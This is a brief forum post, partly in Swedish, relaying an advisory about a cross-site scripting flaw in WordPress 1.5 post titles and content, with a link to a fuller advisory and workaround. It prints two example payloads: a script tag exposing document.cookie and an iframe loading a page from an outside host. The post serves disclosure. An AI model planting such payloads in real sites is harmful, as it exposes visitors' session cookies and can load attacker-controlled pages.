Det har hittats en sårbarhet i WordPress 1.5
WordPress is a popular blogging system built on PHP (the scripting language) and is licensed under the GPL. It is free software supported by a large and vibrant community of users. You can use WordPress as a stand-alone application to publish your web log, or incorporate its functionality into an existing site.
============================================================
*Problem Description:
Bug is in the content and title of post, when not controlling the entrance of characters, being able to inject HTML code
============================================================
*Example:
Type in the title or content of post
<script>alert(document.cookie)</script>
<iframe src=http://othersite/sb.php>
============================================================
Mer information och en workaround finns på:
http://packetstormsecurity.org/0504-advisories/wordpress15.txt
Start discussion »
Skriv ett svar